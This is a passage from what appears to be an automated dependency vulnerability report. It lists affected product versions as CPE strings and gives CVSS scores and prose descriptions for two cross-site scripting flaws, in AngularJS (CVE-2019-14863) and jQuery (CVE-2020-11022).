cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0 cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:* versions from (including) 6.0; versions up to (including) 6.4 cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:* versions from (including) 4.1; versions up to (including) 4.3 cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_operations_monitor:4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_operations_monitor:4.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_unified_inventory_management:7.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:diagnostic_assistant:2.12.36:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 7.3.3; versions up to (including) 7.3.5 cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:* versions from (including) 8.0.5; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.0.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.5.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_retail_customer_analytics:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.6 cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:* versions from (including) 19.1.0; versions up to (including) 19.1.2 cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:identity_manager:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:* versions from (including) 5.0.0.0; versions up to (including) 5.6.0.0 cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_performance_insight:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:* versions from (including) 8.6.0; versions up to (including) 8.6.3 cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.15 cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.15 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 16.2.0; versions up to (including) 16.2.11 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 17.12.0; versions up to (including) 17.12.7 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 18.8.0; versions up to (including) 18.8.9 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 19.12.0; versions up to (including) 19.12.4 cpe:2.3:a:oracle:primavera_gateway:15.2.18:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:* versions from (including) 17.7; versions up to (including) 17.12 cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:real-time_scheduler:*:*:*:*:*:*:*:* versions from (including) 2.3.0.1; versions up to (including) 2.3.0.3 cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:* cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_central_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_point-of-service:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_mobile_applications:*:*:*:*:*:*:*:* versions up to (including) 19.8 cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:system_utilities:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:tape_library_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:transportation_management:1.4.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:utilities_mobile_workforce_management:*:*:*:*:*:*:*:* versions from (including) 2.3.0.1; versions up to (including) 2.3.0.3 cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:redhat:cloudforms:4.7:*:*:*:*:*:*:* cpe:2.3:a:redhat:virtualization_manager:4.3:*:*:*:*:*:*:* CVE-2019-14863 suppress
There is a vulnerability in all angular versions before 1.5.0-beta.0, where after escaping the context of the web application, the web application delivers data to its users along with other trusted dynamic content, without validating it. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions from (including) 1.0.0; versions up to (including) 1.4.14 cpe:2.3:a:redhat:decision_manager:7.0:*:*:*:*:*:*:* cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:* CVE-2020-11022 suppress
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY info - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ security-advisories@github.com - BROKEN_LINK security-advisories@github.com - BROKEN_LINK security-advisories@github.com - BROKEN_LINK security-advisories@github.com - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MITIGATION,THIRD_PARTY_ADVISORY security-advisories@github.com - MITIGATION,VENDOR_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - RELEASE_NOTES,VENDOR_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.70 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.7.0; versions up to (excluding) 8.7.14 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.8.0; versions up to (excluding) 8.8.6 cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions from (including) 1.2; versions up to (excluding) 3.5.0 cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3 cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_supplier_collaboration_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:*:*:*:*:*:*:*:* versions from (including) 18.1; versions up to (including) 20.1 cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:* versions up to (excluding) 21.1.2 cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router_idih\::*:*:*:*:*:*:*:* versions from (including) 8.0.0; versions up to (including) 8.2.2 cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0 cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.6.0.0; versions up to (including) 8.1.0.0.0 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:* versions from (including) 19.1.0; versions up to (including) 19.1.2 